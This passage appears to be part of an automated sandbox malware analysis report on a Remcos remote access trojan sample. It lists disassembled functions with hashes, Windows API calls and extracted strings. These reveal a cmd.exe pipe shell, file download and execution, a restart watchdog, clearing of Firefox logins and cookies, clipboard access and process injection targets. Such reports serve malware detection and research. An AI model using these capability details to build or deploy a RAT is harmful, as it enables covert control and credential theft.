                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
                                                                                          • Instruction ID: 1e9d0a06bdb6e9f7b23a96960dfc4b712b0be9606a3b942e14a6d4fe6a34620f
                                                                                          • Opcode Fuzzy Hash: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
                                                                                          • Instruction Fuzzy Hash: EBF0E2706042016BCB0C8B34CD50B2A37954B84325F248F7FF02BD61E0C73EC8918A0D
                                                                                          Function 0041BB27 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetForegroundWindow.USER32 ref: 0041BB49
                                                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BB5C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Window$ForegroundText
                                                                                          • String ID:
                                                                                          • API String ID: 29597999-0
                                                                                          • Opcode ID: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                                                                          • Instruction ID: 8c7c0eb369f00208a7459315ff6bb8442305c4ed6b2016914032ba092e23deac
                                                                                          • Opcode Fuzzy Hash: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                                                                          • Instruction Fuzzy Hash: 21E04875A00328A7E720A7A5AC4EFD5776C9708755F0001AEBA1CD61C2EDB4AD448BE5
                                                                                          Function 00409E1F Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _wcslen
                                                                                          • String ID:
                                                                                          • API String ID: 176396367-0
                                                                                          • Opcode ID: 2909f1be4624e20aefd95f70af1697863fb55ab0ff45cf84c0a49d4b96723009
                                                                                          • Instruction ID: e26466b944e621eef81fbe5db30e3e3b172770e45cde188e8c087a2518f8d89f
                                                                                          • Opcode Fuzzy Hash: 2909f1be4624e20aefd95f70af1697863fb55ab0ff45cf84c0a49d4b96723009
                                                                                          • Instruction Fuzzy Hash: 631181319002059BCB15EF66E852AEF7BB4AF54314B10413FF446A62E2EF78AD15CB98
                                                                                          Function 004461B8 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                                          • Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
                                                                                          • Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                                          • Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF
                                                                                          Function 0040489E Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Startup
                                                                                          • String ID:
                                                                                          • API String ID: 724789610-0
                                                                                          • Opcode ID: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                                                                          • Instruction ID: 97c3e6bab4f4407137ad71e204409d8be70fba83985c90e8682379c152a4c00d
                                                                                          • Opcode Fuzzy Hash: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                                                                          • Instruction Fuzzy Hash: 92D0123255C70C8EE620ABB4AD0F8A4775CC317616F0007BA6CB5836D3E6405B1DC2AB
                                                                                          Function 004027A7 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • std::_Deallocate.LIBCONCRT ref: 00402E2B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Deallocatestd::_
                                                                                          • String ID:
                                                                                          • API String ID: 1323251999-0
                                                                                          • Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                                          • Instruction ID: a1ed0c2070530d0d1545540182683da5b3cb4a6c90a46b83737b9b29f97d9faa
                                                                                          • Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                                          • Instruction Fuzzy Hash: FFB092364442007ACA026640AC86F5EB762ABA4710F14C92ABA9A281E2D6B74268A647
                                                                                          Function 00426D42 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: recv
                                                                                          • String ID:
                                                                                          • API String ID: 1507349165-0
                                                                                          • Opcode ID: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                                                          • Instruction ID: c63eaffdb417a6470c671315a396a42075a312041b5b8b5670d44767818a4bbd
                                                                                          • Opcode Fuzzy Hash: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                                                          • Instruction Fuzzy Hash: 26B09279108202FFCA150B60CC0886ABEA6ABC8382B00882DB586411B0C736C851AB26
                                                                                          Function 00426D59 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: send
                                                                                          • String ID:
                                                                                          • API String ID: 2809346765-0
                                                                                          • Opcode ID: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                                                          • Instruction ID: 21703143275c54c82102de5c78eddca0fb0a16d203a0de67c7bd570fb3111ac2
                                                                                          • Opcode Fuzzy Hash: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                                                          • Instruction Fuzzy Hash: 87B09B75108301FFD6150760CC0486A7D6597C8341F00491C718741170C635C8515725

                                                                                          Non-executed Functions

                                                                                          Function 0040569A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 278pipesleepfileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __Init_thread_footer.LIBCMT ref: 004056E6
                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                          • __Init_thread_footer.LIBCMT ref: 00405723
                                                                                          • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                                                                                          • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                                                          • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                                                          • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                                                                          • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                                                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                          • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660D0,00000062,004660B4), ref: 004059E4
                                                                                          • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                                                          • CloseHandle.KERNEL32 ref: 00405A23
                                                                                          • CloseHandle.KERNEL32 ref: 00405A2B
                                                                                          • CloseHandle.KERNEL32 ref: 00405A3D
                                                                                          • CloseHandle.KERNEL32 ref: 00405A45
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                          • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                                                          • API String ID: 2994406822-18413064
                                                                                          • Opcode ID: 2febcb657377c2e49ad8878f16061337e22dda141b774b0d1b873db27d34a9ac
                                                                                          • Instruction ID: feb7c3e087fbbfe745e3798ef664df189eb35a760580a6c3fca7c2e5343dee52
                                                                                          • Opcode Fuzzy Hash: 2febcb657377c2e49ad8878f16061337e22dda141b774b0d1b873db27d34a9ac
                                                                                          • Instruction Fuzzy Hash: 1A91C271604604AFD711FB36ED42A6B369AEB84308F01443FF589A62E2DB7D9C448F6D
                                                                                          Function 00407CD2 Relevance: 34.1, APIs: 10, Strings: 9, Instructions: 835filesleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                                                                          • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                                                                          • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                                                                            • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                                                            • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                                                            • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                                                            • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                                                            • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                            • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                            • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                                                                          • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004082B3
                                                                                          • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                                                                          • DeleteFileA.KERNEL32(?), ref: 0040868D
                                                                                            • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                                                                            • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                                            • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                                            • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                                          • Sleep.KERNEL32(000007D0), ref: 00408733
                                                                                          • StrToIntA.SHLWAPI(00000000,00000000), ref: 00408775
                                                                                            • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                                                          • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
                                                                                          • API String ID: 1067849700-1507758755
                                                                                          • Opcode ID: 208cba599405dc4689d7877f64945274f339b2de16a69b7ca95e59de892436e4
                                                                                          • Instruction ID: f533dcafa702064eae222fc9ff54aa9327b172b3479e3db69e1c842a3252ef64
                                                                                          • Opcode Fuzzy Hash: 208cba599405dc4689d7877f64945274f339b2de16a69b7ca95e59de892436e4
                                                                                          • Instruction Fuzzy Hash: F04293716043016BC604FB76C9579AE77A9AF91348F80483FF542671E2EF7C9908879B
                                                                                          Function 00412132 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00412141
                                                                                            • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                            • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                                                            • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                                                          • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412181
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00412190
                                                                                          • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                                                                          • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                                          • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                                                          • API String ID: 3018269243-13974260
                                                                                          • Opcode ID: b3951b22144ccdf2d4cd1ddf70918f5d541b623d2cb9c2a4b7a34346c44b0be3
                                                                                          • Instruction ID: f1b014459f2de55ad39b9ce4e2eab06dd530905b6b6ad57ecd0cf2e75cce6712
                                                                                          • Opcode Fuzzy Hash: b3951b22144ccdf2d4cd1ddf70918f5d541b623d2cb9c2a4b7a34346c44b0be3
                                                                                          • Instruction Fuzzy Hash: B971A23160430167C614FB72CD579AE77A4AE94308F40097FF586A21E2FFBC9A49C69E
                                                                                          Function 0040BB6B Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                                                                          • FindClose.KERNEL32(00000000), ref: 0040BC04
                                                                                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                                                                          • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Find$CloseFile$FirstNext
                                                                                          • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                          • API String ID: 1164774033-3681987949
                                                                                          • Opcode ID: 1dd2d77424a1feb7b81cbbfb01062b06d0993b8648acb28e4275aca406a32408
                                                                                          • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                                                                          • Opcode Fuzzy Hash: 1dd2d77424a1feb7b81cbbfb01062b06d0993b8648acb28e4275aca406a32408
                                                                                          • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                                                                          Function 004168FC Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80clipboardmemoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OpenClipboard.USER32 ref: 004168FD
                                                                                          • EmptyClipboard.USER32 ref: 0041690B
                                                                                          • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00416934
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                                                                                          • CloseClipboard.USER32 ref: 00416990
                                                                                          • OpenClipboard.USER32 ref: 00416997
                                                                                          • GetClipboardData.USER32(0000000D), ref: 004169A7
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                                          • CloseClipboard.USER32 ref: 004169BF
                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                          • String ID: !D@
                                                                                          • API String ID: 3520204547-604454484
                                                                                          • Opcode ID: 257326ec153dacac18454150c5240309e865c30b0bc4197c45747697bab63ef0
                                                                                          • Instruction ID: 548dc4d81477911aad8e8b192ef25fd2d65b79b2884d290c2f7190e4363fe536
                                                                                          • Opcode Fuzzy Hash: 257326ec153dacac18454150c5240309e865c30b0bc4197c45747697bab63ef0
                                                                                          • Instruction Fuzzy Hash: 23215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                                                                                          Function 0040BD72 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                                                                          • FindClose.KERNEL32(00000000), ref: 0040BE04
                                                                                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                                                                          • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                                                                          • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Find$Close$File$FirstNext
                                                                                          • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                          • API String ID: 3527384056-432212279
                                                                                          • Opcode ID: 0e02877a0a7a0854a613cb848fbdcbf87c912738fbad3b4f45ae5d99c19712fd
                                                                                          • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                                                                          • Opcode Fuzzy Hash: 0e02877a0a7a0854a613cb848fbdcbf87c912738fbad3b4f45ae5d99c19712fd
                                                                                          • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                                                                          Function 0041330D Relevance: 18.2, APIs: 12, Instructions: 153fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                                                                          • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                                                                          • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                                                                          • CloseHandle.KERNEL32(?), ref: 004134A0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                                                          • String ID:
                                                                                          • API String ID: 297527592-0
                                                                                          • Opcode ID: 508c16f966a808e54501f7bca4be6d297b5a0c623f3719da694ed0cdf11329f0
                                                                                          • Instruction ID: 84c8eec30da1abd4ec43dfc3561b6153623c17c5959ee0fa3a13cc5c00e14cc2
                                                                                          • Opcode Fuzzy Hash: 508c16f966a808e54501f7bca4be6d297b5a0c623f3719da694ed0cdf11329f0
                                                                                          • Instruction Fuzzy Hash: F041F331104301BBD7119F25EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                                                                                          Function 0040F4AF Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 210processCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F4C9
                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00475338), ref: 0040F4F4
                                                                                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F59E
                                                                                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                          • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F6A9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                                                          • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                                                          • API String ID: 3756808967-1743721670
                                                                                          • Opcode ID: 1d3c19fb237022e801d10a57cb3e4ad5faa3765b37f293df49325fb65a29b400
                                                                                          • Instruction ID: 73d50abc618c2a3d6a57d9d5b79267519347fdb4c989691d2635b3abfd1995a7
                                                                                          • Opcode Fuzzy Hash: 1d3c19fb237022e801d10a57cb3e4ad5faa3765b37f293df49325fb65a29b400
                                                                                          • Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                                                                                          Function 00419662 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 206COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0$1$2$3$4$5$6$7
                                                                                          • API String ID: 0-3177665633
                                                                                          • Opcode ID: e6a777f80bf8230cc7af5635f6fa1f38021a03d05ab0836674c6e7259f08b149
                                                                                          • Instruction ID: 7133b754bba813e7b371628f59950815dc208a5c28e1558ec9b3f3725e93ffbd
                                                                                          • Opcode Fuzzy Hash: e6a777f80bf8230cc7af5635f6fa1f38021a03d05ab0836674c6e7259f08b149
